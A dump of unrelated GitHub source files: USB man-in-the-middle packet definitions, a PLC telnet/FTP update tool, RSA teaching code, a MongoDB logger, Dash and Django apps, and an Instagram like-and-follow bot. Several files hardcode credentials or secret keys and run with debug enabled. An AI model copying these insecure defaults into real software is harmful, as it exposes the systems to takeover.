elif isinstance(self.management_content, ManagementReload):
p = struct.pack('<H', USBMitm.ManagementType.RELOAD) + p[2:]
else:
p = struct.pack('<H', USBMitm.ManagementType.RESET) + p[2:]
return p + pay
def desc(self):
if self.management_type == USBMitm.ManagementType.RESET:
return 'Reset'
elif self.management_type == USBMitm.ManagementType.RELOAD:
return 'Reload'
else:
return self.management_content.desc()
class USBMessage(USBMitm):
def is_management(self):
return self.type == 2
def is_ack(self):
return self.type == 1
def is_usb_data(self):
return self.type == 0
def post_build(self, p, pay):
if self.len is None:
p = struct.pack('<I', len(p)) + p[4:]
return p + pay
def get_usb_payload(self):
return self.content.get_usb_payload()
class USBMessageDevice(USBMessage):
'UDP packet payload from ubq_core bearing USB traffic from device->host.'
name = 'USBMessageDevice'
fields_desc = [
LEIntField('len', None),
EnumField('type', USBMitm.MitmType.USB, USBMitm.MitmType.desc, '<I'),
TypePacketField(
'content',
ManagementMessage(),
'type',
{0: USBMessageResponse, 1: USBAck, 2: ManagementMessage},
),
]
def desc(self):
return self.content.desc()
class USBMessageHost(USBMessage):
'UDP packet payload from ubq_core bearing USB traffic from host->device.'
name = 'USBMessageHost'
fields_desc = [
LEIntField('len', None),
EnumField(
'type', USBMitm.ManagementType.RESET, USBMitm.ManagementType.desc, '<I'
),
TypePacketField(
'content',
ManagementMessage(),
'type',
{0: USBMessageRequest, 1: USBAck, 2: ManagementMessage},
),
]
def desc(self):
return self.content.desc()
| [
"bm16ton@gmail.com"
] | bm16ton@gmail.com |
57d6937bf3629457efc49a2d6401c480d6dbdfa2 | 31021bb9d9788b132787f88db2dc8198a2686ba3 | /WorkThread.py | 9358e077ea039d629a8d9c83b74245bab20f405f | [] | no_license | yljtsgw/BootAssistant | f94846c58f6528c1c10d934be31dc9149854e9a3 | 5380d8436cdc0958ff2e344a516898dc75427355 | refs/heads/master | 2021-01-20T17:57:40.994834 | 2016-07-19T07:55:46 | 2016-07-19T07:55:46 | 63,671,555 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,810 | py | #!/usr/bin/env python
# coding:utf-8
"""
Author: --<>
Purpose:
Created: 2016/5/26
"""
from telnet import telnet
from ftp import ftpTool
from PyQt4.QtCore import QThread, pyqtSignal
import os
import config
import logging
logger_working = logging.getLogger('main.working')
########################################################################
class workThread(QThread):
"""下载线程"""
sinOut1 = pyqtSignal(str)
sinOut2 = pyqtSignal(int)
# ----------------------------------------------------------------------
def __init__(self, parent=None):
"""输入对应IP 用户名及密码"""
super(workThread, self).__init__(parent)
self.funcType = 1
self.lock = False
self.tel = None
self.ftp = None
def setup(self, host, usr, psw):
self.ftp = ftpTool(host, usr, psw)
self.tel = telnet(host, usr, psw)
def downloadFiles(self, remotedir, localdir):
if self.lock:
self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
return
self.localdir = localdir
self.remotedir = remotedir
self.funcType = config.CON_DOWNLOAD
self.lock = True
self.start()
def uploadFiles(self,localdir,backupEnable):
self.backupEnable = backupEnable
if self.lock:
self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
return
self.localdir = localdir
self.funcType = config.CON_UPLOAD
self.lock = True
self.start()
#self.run()
def updatePlc(self,parambackupDelete):
if self.lock:
self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
return
self.parambackupDelete = parambackupDelete
self.funcType = config.CON_UPDATE
self.lock = True
self.start()
def restartPlc(self):
if self.lock:
self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
return
self.funcType = config.CON_RESTARTPLC
self.lock = True
self.start()
def cleanData(self):
print "print self.lock:", self.lock
if self.lock:
self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
return
self.funcType = config.CON_CLEANDISK2
self.lock = True
self.start()
#self.run()
def run(self):
try:
if self.funcType == config.CON_DOWNLOAD:
self.download()
elif self.funcType == config.CON_UPLOAD:
self.upload()
elif self.funcType == config.CON_UPDATE:
self.update()
elif self.funcType == config.CON_RESTARTPLC:
cmd = 'cxsuspend'
self.sinOut1.emit(u'下发重启命令...' )
self.runTelnetCmd(cmd)
self.sinOut1.emit(u'已下发重启命令,请等待PLC重启...' )
elif self.funcType == config.CON_KILLCERHOST:
pass
elif self.funcType == config.CON_CLEANDISK2:
self.clean()
except Exception,e:
logger_working.exception(str(e))
finally:
self.lock = False
self.sinOut2.emit(self.funcType)
def runTelnetCmd(self,cmd):
if self.telnetConnect():
self.tel.cmd(cmd)
def clean(self):
try:
ret = self.ftpConnect()
if not ret:
return False
nlist = ['celogger_data','SC','StatusCode','Tracelog']
filelist = self.ftp.nlst()
print filelist
for files in nlist:
logger_working.info("file: %s"%files)
if files in filelist:
logger_working.info("%s in %s"%(files,str(filelist)))
self.sinOut1.emit(u'正在删除%s..'%files )
self.ftp.clearDir(files)
else:
self.sinOut1.emit(u'正在重新创建%s..'%files )
self.ftp.mkd(files)
self.sinOut1.emit(u'清理Hard Disk2完成' )
except Exception,e:
logger_working.exception(str(e))
def download(self):
try:
# telnet 将boot里的文件移至bootrm
ret = self.telnetConnect()
if not ret:
return False
self.sinOut1.emit(u'在目标机删除临时目录下的文件')
self.tel.delFiles(config.TEMPDIR)
self.sinOut1.emit(u'在目标机创建临时目录')
self.tel.mkDir(config.TEMPDIR)
self.sinOut1.emit(u'将%s复制至%s' % (config.TARGETDIR, config.TEMPDIR))
self.tel.copyFiles(config.TARGETDIR, config.TEMPDIR)
if not self.ftpConnect():
return
# self.ftp.cwd(self.remotedir)
# self.sinOut1.emit(u'转到目录: %s' % self.remotedir)
remotedir = os.path.split(self.remotedir)[1]
localdir = os.path.join(self.localdir, remotedir)
if not os.path.isdir(localdir):
self.sinOut1.emit(u'创建本地路径: %s' % localdir)
os.makedirs(localdir)
remotenames = self.ftp.getfileList(self.remotedir)
self.sinOut1.emit(u'获取目标机文件列表')
for item in remotenames:
filesize = int(item[0])
filename = item[1]
local = os.path.join(localdir, filename)
local = local.replace('\\', '/')
self.sinOut1.emit(u'>>>>正在下载文件:%s ....' % filename)
ret = self.ftp.download_file(local, filename, filesize)
if len(ret) > 0 :
self.sinOut1.emit(ret)
self.sinOut1.emit(u'%s 下载完成' % (filename))
self.sinOut1.emit(u'全部文件下载完成,下载至:\n%s' % (localdir))
self.ftp.cwd('..')
except Exception, e:
logger_working.exception(str(e))
finally:
self.lock = False
def upload(self):
try:
bootlist = ['Boot','CplusApplication','EventAnalyze','Parameter','Parameter_backup','ReportApplication']
if not self.telnetConnect():
return
if self.backupEnable:
self.sinOut1.emit(u'在目标机删除备份目录下的文件')
self.tel.delFiles(config.BACKUPDIR)
self.sinOut1.emit(u'在目标机创建备份目录')
self.tel.mkDir(config.BACKUPDIR)
self.tel.delFiles(config.BACKUPDIR)
for filename in bootlist:
self.sinOut1.emit(u'在目标机创建备份目录%s文件夹'%filename)
tfilename = '%s\\\\%s'%(config.BACKUPDIR,filename)
print tfilename
self.tel.mkDir(tfilename)
sfilename = r'%s\\%s'%(config.ROOTDIR,filename)
self.sinOut1.emit(u'将%s复制至%s'%(sfilename,tfilename) )
self.tel.copyFiles(sfilename, tfilename)
self.tel.delFiles(config.UPDATEDIR)
self.tel.mkDir(config.UPDATEDIR)
self.sinOut1.emit(u'在目标机创建升级目录')
updateDir = os.path.split(config.UPDATEDIR)[1]
#self.ftp.cwd(updateDir)
#self.sinOut1.emit(u'转到目录: %s'%updateDir)
self.sinOut1.emit(u'正在上传本地文件夹:%s'%self.localdir)
if not self.ftpConnect():
return
self.uploadDir(self.localdir,updateDir)
self.sinOut1.emit(u'全部文件上传完成,上传至%s'%(updateDir))
except Exception ,e:
logger_working.exception(str(e))
finally:
self.lock = False
return
def uploadDir(self,localdir,remotedir):
try:
if not os.path.isdir(localdir):
return
self.ftp.cwd(remotedir)
for file in os.listdir(localdir):
src = os.path.join(localdir, file)
if os.path.isfile(src):
#file = unicode(file,'gbk')
logger_working.info(u'>>>>>>>正在上传文件:%s ...'%file)
self.ftp.uploadFile(src, file)
elif os.path.isdir(src):
try:
self.sinOut1.emit(u'>>>>正在上传文件夹:%s ....' % file)
self.ftp.mkd(file)
except:
logger_working.info('the dir is exists %s' % file)
self.uploadDir(src, file)
logger_working.info( 'current ftp pwd:'+self.ftp.pwd())
self.ftp.cwd('../')
except Exception,e:
logger_working.exception(str(e))
logger_working.error(self.ftp.pwd())
return
def update(self):
try:
if not self.telnetConnect():
return
if not self.ftpConnect():
return
updatedirList = self.ftp.nlst('update')
self.sinOut1.emit(u'创建临时文件存放原BOOT文件')
self.tel.delFiles(config.TEMPBDIR)
self.tel.mkDir(config.TEMPBDIR)
if self.parambackupDelete:
pathDir = os.path.join(config.ROOTDIR, 'Parameter_backup')
if self.tel.movePath(pathDir,config.TEMPBDIR):
self.sinOut1.emit(u'移动: %s 至%s'%(pathDir,config.TEMPBDIR))
for pathName in updatedirList:
isFile = False
if '.' in pathName:
isFile = True
pathDir = config.ROOTDIR
else:
pathDir = os.path.join(config.ROOTDIR,pathName)
if self.tel.movePath(pathDir,config.TEMPBDIR):
self.sinOut1.emit(u'移动: %s 至%s'%(pathDir,config.TEMPBDIR))
self.tel.mkDir(pathDir)
souseDir = os.path.join(config.UPDATEDIR,pathName)
self.sinOut1.emit(u'复制: %s 至%s'%(souseDir,pathDir))
if isFile:
self.tel.copyFile(souseDir,pathDir)
else:
self.tel.copyFiles(souseDir,pathDir)
self.sinOut1.emit(u'复制完成,请需启用BOOT,请重启PLC')
except Exception,e:
logger_working.exception(str(e))
def telnetConnect(self):
self.sinOut1.emit(u'正在telnet连接:%s'%self.tel.host)
if not self.tel.telnet_connect():
self.sinOut1.emit(u'启动TELNET连接失败,请确认配置文件中用户名密码正确')
return False
self.sinOut1.emit(u'启动TELNET连接成功')
return True
def ftpConnect(self):
self.sinOut1.emit(u'ftp连接:%s'%self.ftp.host )
if not self.ftp.connect():
self.sinOut1.emit(u'ftp连接失败,请确认配置文件中用户名密码正确')
return False
self.sinOut1.emit(u'ftp连接成功')
return True
def __del__(self):
print '__del__ for thread'
if self.tel != None:
try:
self.tel.close()
except Exception,e:
print e
self.tel = None
if self.ftp != None:
try:
self.ftp.quit()
except Exception,e:
print e
self.ftp = None
if __name__ == '__main__':
host = '172.16.43.189'
usr = 'guest'
psw = '1'
| [
"393915549@qq.com"
] | 393915549@qq.com |
8a59b938196d4b7591563206ea27e0574a9c0ec2 | b251bb2eb3b91afd2c9641ffc0abf2b43475d920 | /Lecture notes/Notes 19 - Cryptography/RSA.py | 76a2de5b22624226818730673a7e42703f091db0 | [] | no_license | maverick19910614/COMP9021 | 912dc18ea9f3002febeaebc199f41ad2ce2418e2 | 25bccce7ae094f444d1221cc1fef6c3a7d278488 | refs/heads/main | 2023-04-22T20:14:49.887272 | 2021-05-13T08:20:17 | 2021-05-13T08:20:17 | 366,661,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,297 | py | # Written by Eric Martin for COMP9021
from math import gcd
from random import randrange
def diffie_hellman(p, g):
print(f'Alice lets Bob know that p = {p} and g = {g}.')
a = randrange(100)
A = g ** a % p
b = randrange(100)
B = g ** b % p
print(f'Alice sends {A} to Bob.')
print(f'Bob sends {B} to Alice.')
print(f'Alice computes the secret code as {B ** a % p}.')
print(f'Bob computes the secret code as {A ** b % p}.')
def RSA(p, q):
N = p * q
phi_of_N = (p - 1) * (q - 1)
e = 65537
print(f'Alice publishes public key: N = {N}, e = {e}')
_, d = bezout_coefficients(phi_of_N, e)
# d does not have to be smaller than phi_of_N, but it has to be positive.
d %= phi_of_N
m = randrange(100)
c = m ** e % N
print(f'Bob encodes {m} as {c}.')
print(f'Alice decodes {c} as {modular_exponentiation(c, d, N)}.')
def bezout_coefficients(a, b):
'''
Returns a pair (x, y) with ax + by = gcd(a, b)
>>> a, b = bezout_coefficients(-1, 1)
>>> a, b
(0, 1)
>>> a * -1 + b * 1 == gcd(-1, 1)
True
>>> a, b = bezout_coefficients(4, 6)
>>> a, b
(-1, 1)
>>> a * 4 + b * 6 == gcd(4, 6)
True
>>> a, b = bezout_coefficients(782, 253)
>>> a, b
(1, -3)
>>> a * 782 + b * 253 == gcd(782, 253)
True
>>> a, b = bezout_coefficients(-321, 654)
>>> a, b
(55, 27)
>>> a * -321 + b * 654 == gcd(321, 654)
True
'''
if b == 0:
return 1, 0
x, y = bezout_coefficients(b, a % b)
return y, x - (a // b) * y
def modular_exponentiation(x, n, p):
'''
Returns x^n (mod p)
>>> modular_exponentiation(2, 0, 10)
1
>>> modular_exponentiation(2, 1, 10)
2
>>> modular_exponentiation(2, 3, 10)
8
>>> modular_exponentiation(2, 4, 10)
6
>>> modular_exponentiation(2, 5, 10)
2
>>> modular_exponentiation(10 * 10_000_000, 10_000_000, 10)
0
>>> modular_exponentiation(9 * 10_000_000, 10_000_000, 31)
25
>>> modular_exponentiation(7 * 10_000_000, 10_000_000, 94)
12
'''
if n == 0:
return 1
y = modular_exponentiation((x * x) % p, n // 2, p)
if n % 2:
y = (y * x) % p
return y
if __name__ == '__main__':
import doctest
doctest.testmod()
| [
"noreply@github.com"
] | noreply@github.com |
8deecf9ce3bdcb7373459cff5718007aee8af798 | 751970ea93f32967f0c986b449aec415ce2140a6 | /mongologger/__init__.py | 3c6bf3cea4240c04587d83c78cbd597e67a00e60 | [] | no_license | warvariuc/python-mongo-logger | 800bef339ae96ad1ec7e767aaee5602749f1bb2f | 6ad23270427b4f627e74487da6f3593cb7bc426b | refs/heads/master | 2021-01-18T16:27:55.120227 | 2015-07-07T06:07:14 | 2015-07-07T06:07:14 | 29,913,534 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,586 | py | """
Based on: https://gist.github.com/kesor/1589672
"""
from ._version import __version__
import logging
import time
import struct
import traceback
import inspect
from pymongo.mongo_client import MongoClient
import bson
from bson.errors import InvalidBSON
from bson import json_util
logger = logging.getLogger('mongologger')
def create_logger(until_modules=('pymongo', 'mongoengine'), stack_size=3):
"""Create and activate the Mongo-Logger.
Args:
modules (list): list of top level module names until which the stack should be shown;
pass an empty sequence to show the whole stack
stack_size (int): how many frames before any of `modules` was entered to show; pass
-1 to show the whole stack or 0 to show no stack
"""
if not logger.isEnabledFor('info'):
return
# monkey-patch methods to record messages
MongoClient._send_message = _instrument(MongoClient._send_message, until_modules, stack_size)
MongoClient._send_message_with_response = _instrument(MongoClient._send_message_with_response,
until_modules, stack_size)
return logger
def _instrument(original_method, until_modules, stack_size):
"""Monkey-patch the given pymongo function which sends queries to MongoDB.
"""
def instrumented_method(*args, **kwargs):
start_time = time.time()
result = original_method(*args, **kwargs)
duration = time.time() - start_time
try:
message = decode_wire_protocol(args[1][1])
stack = ('\n' + ''.join(get_stack(until_modules, stack_size))).rstrip()
logger.info('%.3f %s %s %s%s', duration, message['op'], message['collection'],
json_util.dumps(message['query']), stack)
except Exception as exc:
logger.info('%.3f *** Failed to log the query *** %s', duration, exc)
return result
return instrumented_method
def get_stack(until_modules, stack_size):
"""
"""
frames = inspect.stack()[2:]
frame_index = None
for i, (frame, _, _, _, _, _) in enumerate(frames):
module_name, _, _ = frame.f_globals['__name__'].partition('.')
if module_name in until_modules:
frame_index = i
elif frame_index is not None:
# found first frame before the needed module frame was entered
break
if frame_index is not None:
del frames[:frame_index + 1]
if stack_size >= 0:
del frames[stack_size:]
stack = [(filename, lineno, name, lines[0])
for frame, filename, lineno, name, lines, _ in frames]
return traceback.format_list(stack)
MONGO_OPS = {
2001: 'msg',
2002: 'insert',
2003: 'reserved',
2004: 'query',
2005: 'get_more',
2006: 'delete',
2007: 'kill_cursors',
}
def decode_wire_protocol(message):
""" http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol """
_, msg_id, _, opcode, _ = struct.unpack('<iiiii', message[:20])
op = MONGO_OPS.get(opcode, 'unknown')
zidx = 20
collection_name_size = message[zidx:].find('\0')
collection_name = message[zidx:zidx + collection_name_size]
zidx += collection_name_size + 1
skip, limit = struct.unpack('<ii', message[zidx:zidx + 8])
zidx += 8
try:
msg = bson.decode_all(message[zidx:])
except InvalidBSON:
msg = 'invalid bson'
return {
'op': op, 'collection': collection_name, 'msg_id': msg_id, 'skip': skip, 'limit': limit,
'query': msg,
}
| [
"victor.varvariuc@gmail.com"
] | victor.varvariuc@gmail.com |
cbf3fc3e1c010cf4650748884952e3aa984b29ec | 6dbc183ba0c2f6722f343adc097447bcffe60934 | /index.py | 7b8ac5c47ff40ca6d17084dae07a261ffd29a357 | [] | no_license | slaytor/ODIE | ce32b0f97ba809b439f3ca3a5ff0b38ce34951e6 | 62588f663762930ee2383f3b1244795aeacf7b8c | refs/heads/master | 2022-12-14T22:49:02.024643 | 2018-06-04T16:57:05 | 2018-06-04T16:57:05 | 136,056,115 | 0 | 0 | null | 2022-12-08T01:00:27 | 2018-06-04T16:51:48 | Python | UTF-8 | Python | false | false | 1,615 | py | from dash.dependencies import Input, Output
import dash_core_components as dcc
import dash_html_components as html
import dash_table_experiments as dt
from app import app, server
from apps import home, jobs_app, ind_app, heatmap_app
from header_footer import header, footer
css = [
'https://cdn.rawgit.com/plotly/dash-app-stylesheets/8485c028c19c393e9ab85e1a4fafd78c489609c2/dash-docs-base.css',
'https://dl.dropboxusercontent.com/s/t8d6kluyt7y1sls/custom.css?dl=0',
'https://fonts.googleapis.com/css?family=Dosis',
'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'
]
js = ['https://cdn.rawgit.com/slaytor/Projects/ba3e394f/gtag.js']
app.layout = html.Div([
dcc.Location(id='url', refresh=False),
html.Div(dt.DataTable(rows=[{}]), style={'display': 'none'}),
header,
html.Div([
html.Div(id='page-content'),
],
className='content-container',
style={'margin-left': '30', 'margin-right': '30'}),
footer,
])
@app.callback(Output('page-content', 'children'),
[Input('url', 'pathname')])
def display_page(pathname):
if pathname == '/':
return jobs_app.layout
if pathname == '/apps/jobs_app':
return jobs_app.layout
elif pathname == '/apps/ind_app':
return ind_app.layout
elif pathname == '/apps/heatmap_app':
return heatmap_app.layout
else:
return '404'
app.scripts.config.serve_locally = False
app.css.append_css({'external_url': css})
app.scripts.append_script({'external_url': js})
if __name__ == '__main__':
app.run_server(debug=True)
| [
"noreply@github.com"
] | noreply@github.com |
efc7edcca15e51d14d5224f7a0a28ee36f478f76 | d185edc1927a7ba4744af04435cfe61812596200 | /cms/views.py | 886138346b1bbf6564aac8b8fef96c76fc26c4dc | [] | no_license | PrzemyslawKuston/DjangoCMS | 51a69fba9ce781713a96641481eb5f9afe44bc22 | 35f29c5305ee179c7bb2ab845c80c053d819a110 | refs/heads/master | 2021-01-02T09:08:50.129259 | 2017-01-11T19:38:52 | 2017-01-11T19:38:52 | 75,053,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,605 | py | from django.shortcuts import render, render_to_response, redirect
from django.http import HttpResponseRedirect
from django.contrib import auth
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout
from notifications.models import Notifications
def index(request):
return render(request, 'index.html')
def about(request):
return render(request, 'about.html')
#--- nowe
def login(request):
c = {}
return render(request, 'login.html', c)
def auth_view(request):
username = request.POST.get('username','')
password = request.POST.get('password','')
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request,user)
return HttpResponseRedirect('/accounts/loggedin/')
else:
return HttpResponseRedirect('/accounts/invalid/')
def loggedin(request):
return render(request, 'loggedin.html',{'user_name' : request.user.username, 'notifications': Notifications.objects.filter(user=request.user, viewed=False)})
def logout(request):
auth.logout(request)
return render_to_response('logout.html')
def invalid_login(request):
return render_to_response('invalid_login.html')
def create_user(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return render(request, '/accounts/create_user_success/')
args = {}
args['form'] = UserCreationForm()
return render(request, 'create_user.html', args)
def create_user_success(request):
return render(request,'create_user_success.html')
| [
"Prz Kus"
] | Prz Kus |
ab0e5016475d187376e113b7f16bdf8f3b8390c3 | 70c724f693f5f097fa8dcc5ab4c76398fc753658 | /examples/like_and_follow_your_last_media_likers.py | 0872e03ff5f0a9a2901f41108fb862367088ebee | [
"Apache-2.0"
] | permissive | Plushkin/instabot | 9e1354f5bdd5527c34682d1e845ab3d8a6ce4255 | 757724071e6925fff42a5148da95c24caa4ed248 | refs/heads/master | 2020-05-25T22:53:44.506154 | 2017-04-01T19:19:52 | 2017-04-01T19:19:52 | 84,976,210 | 2 | 0 | null | 2017-04-01T19:19:53 | 2017-03-14T17:09:13 | Python | UTF-8 | Python | false | false | 1,158 | py | """
instabot example
Workflow:
Like and follow likers of last medias from your timeline feed.
"""
import sys
import os
import time
import random
from tqdm import tqdm
import argparse
sys.path.append(os.path.join(sys.path[0], '../'))
from instabot import Bot
def like_and_follow(bot, user_id, nlikes=3):
bot.like_user(user_id, amount=nlikes)
bot.follow(user_id)
return True
def like_and_follow_media_likers(bot, media, nlikes=3):
for user in tqdm(bot.get_media_likers(media), desc="Media likers"):
like_and_follow(bot, user)
time.sleep(10 + 20 * random.random())
return True
def like_and_follow_your_feed_likers(bot, nlikes=3):
last_media = bot.get_your_medias()[0]
return like_and_follow_media_likers(bot, last_media, nlikes=3)
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-u', type=str, help="username")
parser.add_argument('-p', type=str, help="password")
parser.add_argument('-proxy', type=str, help="proxy")
args = parser.parse_args()
bot = Bot()
bot.login(username=args.u, password=args.p,
proxy=args.proxy)
like_and_follow_your_feed_likers(bot)
| [
"ohl.d@yandex.ru"
] | ohl.d@yandex.ru |
ed67b6e7582630336f0732062ed755324b0218de | f0ffb4276e72b1f8759bea4cbd7f711c2de54848 | /coursereg/views.py | df9e81d4c216b6e8b60b2df1eaaae9eb564eefd0 | [] | no_license | shirmino/School-management-app | 16ed86cf6a8ce678d6ff89a9d95c741f4bd51458 | 6498ef43463b4c1e302f89574052cf0fb7a06519 | refs/heads/master | 2022-11-25T09:02:10.036942 | 2020-07-19T12:55:51 | 2020-07-19T12:55:51 | 280,671,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | from django.shortcuts import render, redirect
from .models import CourseModel
from django.contrib.auth.decorators import login_required
from . import forms
from django.contrib.auth.models import User
# Create your views here.
@login_required(login_url = "/accounts/login/")
def course_create(request):
if request.method == 'POST':
form = forms.CourseForm(request.POST)
if form.is_valid():
instance = form.save(commit = False)
instance.User = request.user
instance.save()
return redirect('coursereg:course_list')
else:
form = forms.CourseForm()
return render(request, 'coursereg/course_create.html', {'form': form})
@login_required
def course_list(request):
courses = CourseModel.objects.all().filter(User = request.user).order_by('date')
return render(request, 'coursereg/course_list.html', {'courses': courses}) | [
"Uche@yahoo.com"
] | Uche@yahoo.com |
4171f3f9288b6953d7b6ea9c6d40cec41f3b8406 | 9f1039075cc611198a988034429afed6ec6d7408 | /tensorflow-stubs/contrib/slim/python/slim/nets/inception_v3.pyi | df9dccde040bd84ccfd994e2ec65a1450b9e965f | [] | no_license | matangover/tensorflow-stubs | 9422fbb1cb3a3638958d621461291c315f9c6ec2 | 664bd995ef24f05ba2b3867d979d23ee845cb652 | refs/heads/master | 2020-05-23T12:03:40.996675 | 2019-05-15T06:21:43 | 2019-05-15T06:21:43 | 186,748,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,288 | pyi | # Stubs for tensorflow.contrib.slim.python.slim.nets.inception_v3 (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from tensorflow.contrib import layers as layers
from tensorflow.contrib.framework.python.ops import arg_scope as arg_scope
from tensorflow.contrib.layers.python.layers import initializers as initializers, regularizers as regularizers
from tensorflow.python.framework import ops as ops
from tensorflow.python.ops import array_ops as array_ops, init_ops as init_ops, nn_ops as nn_ops, variable_scope as variable_scope
from typing import Any as Any, Optional as Optional
trunc_normal: Any
def inception_v3_base(inputs: Any, final_endpoint: str = ..., min_depth: int = ..., depth_multiplier: float = ..., scope: Optional[Any] = ...): ...
def inception_v3(inputs: Any, num_classes: int = ..., is_training: bool = ..., dropout_keep_prob: float = ..., min_depth: int = ..., depth_multiplier: float = ..., prediction_fn: Any = ..., spatial_squeeze: bool = ..., reuse: Optional[Any] = ..., scope: str = ...): ...
def inception_v3_arg_scope(weight_decay: float = ..., batch_norm_var_collection: str = ..., batch_norm_decay: float = ..., batch_norm_epsilon: float = ..., updates_collections: Any = ..., use_fused_batchnorm: bool = ...): ...
| [
"matangover@gmail.com"
] | matangover@gmail.com |
0b0598fdad0660c69040b729f8d2a2816d4e62e3 | b3db91714f9fcc4ebf3d41945d6f8247a747a2c5 | /webapp/news/parsers/utils.py | c0ffc729f1414fc626345d45b45dfea1df697859 | [] | no_license | Killarayne/petpj | 54fdb3d21159c2446a2dea2ba4c029f7f32c53f5 | e90b74bc00362b8ba32315fdd3e742130bc66426 | refs/heads/main | 2023-03-01T10:25:21.893944 | 2021-02-16T14:11:46 | 2021-02-16T14:11:46 | 339,421,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | import requests
from webapp.db import db
from webapp.news.models import News
def get_html(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36'}
try:
result = requests.get(url, headers=headers)
result.raise_for_status()
return result.text
except (requests.RequestException, ValueError):
print('Сетевая ошибка')
return False
def save_news(title, url, published):
news_exist = News.query.filter(News.url == url).count()
if not news_exist:
news_news = News(title=title, url=url, published=published)
db.session.add(news_news)
db.session.commit()
| [
"saltykovnikson@gmail.com"
] | saltykovnikson@gmail.com |
7f53c10d5dbe029fa5168d836eba8d9522b3c2a5 | b551729392b06176f1b56894cb693d7fd70663cf | /mydj/settings.py | 1894bfb71c40159da9fc8b52c86c44f30137fa34 | [] | no_license | deepak-arora92/Your-Opinion-Matters-Django- | 0e3a11b6f26d4871e73b3878207435d3d0a88518 | db7b0731633d4aa77702c29c8f04ce005f95c8bb | refs/heads/master | 2022-10-21T21:28:59.171057 | 2016-03-27T17:46:59 | 2016-03-27T17:46:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,282 | py | """
Django settings for mydj project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '58)%t#37%4lkvr&_37h-08&g5+x@j-&9#q)mwp6xjaio92&_a8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'mydj',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'mydj.urls'
WSGI_APPLICATION = 'mydj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'mydatabase',
'USER': 'user',
'PASSWORD': 'password',
'HOST': '127.0.0.1',
'PORT': '3306',
'OPTIONS': { 'init_command': 'SET character_set_connection=utf8,collation_connection=utf8_unicode_ci'}
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_PATH = os.path.join(BASE_DIR,"mydj", 'templates')
TEMPLATE_DIRS = (TEMPLATE_PATH,)
| [
"divinedeepak92@gmail.com"
] | divinedeepak92@gmail.com |
2efa465be4837e8a72faa9a4b74dfac988eb9b4f | 5cf33318ce43d5a7fbdecf33dc27bde2cca7fe10 | /userlogin/models.py | e7c8d0ede2d7dffbea21e3880fcb576d0834ee89 | [] | no_license | priyamkhandelwal/Conferenecesystem | 19efca4b1f6b91e36e47d80326b8190a96217edd | af30ae0865c62a0455ad606d89f95b48144b1845 | refs/heads/master | 2020-12-25T16:47:36.484227 | 2017-03-16T12:46:24 | 2017-03-16T12:46:24 | 66,699,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 673 | py | from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from conference.models import Conference
# Create your models here.
class ProfilePic(models.Model):
picFile = models.FileField(upload_to='documents',default=None,null=True)
class UserProfile(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE,primary_key=True)
usertype = models.CharField(max_length=50,blank=True)
contactNo = models.CharField(max_length=20)
pic = models.OneToOneField(ProfilePic,null=True,blank=True)
regconf = models.ManyToManyField(Conference,blank=True)
def __str__(self):
return self.user.first_name
| [
"priyamkhandelwalbtp@gmail.com"
] | priyamkhandelwalbtp@gmail.com |
6ff7b77d79410b97d84138f416f8c32691a2d8bb | 1312d27f4d2e264e7ea20cf7e76ea50d344c8dbe | /Appendix_1.py | 9e5f1ec3aadb49c99140474a3c44efe2c2a088a1 | [
"BSD-3-Clause"
